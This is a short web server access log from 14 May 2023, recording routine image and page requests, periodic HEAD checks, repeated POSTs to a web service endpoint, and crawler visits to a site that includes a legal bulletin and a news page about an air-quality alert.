172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
66.249.77.21 - - [14/May/2023:16:01:57 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:16:01:57 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [14/May/2023:16:02:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:16:04:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:04:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:05:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
40.77.167.84 - - [14/May/2023:16:07:33 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/May/2023:16:07:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:16:09:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:10:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:16:12:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:11:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.146 - - [14/May/2023:16:13:20 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [14/May/2023:16:14:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:15:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:16:17:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:16:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:17:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [14/May/2023:16:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40376
201.245.192.253 - - [14/May/2023:16:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43649
201.245.192.253 - - [14/May/2023:16:19:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:16:22:50 -0500] "HEAD / HTTP/1.1" 200 -
185.233.19.70 - - [14/May/2023:16:23:19 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/May/2023:16:22:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:16:24:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:22:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
18.220.21.2 - - [14/May/2023:16:24:53 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
34.86.192.84 - - [14/May/2023:16:27:25 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.0" 200 1065
216.245.221.92 - - [14/May/2023:16:27:49 -0500] "HEAD / HTTP/1.1" 200 -
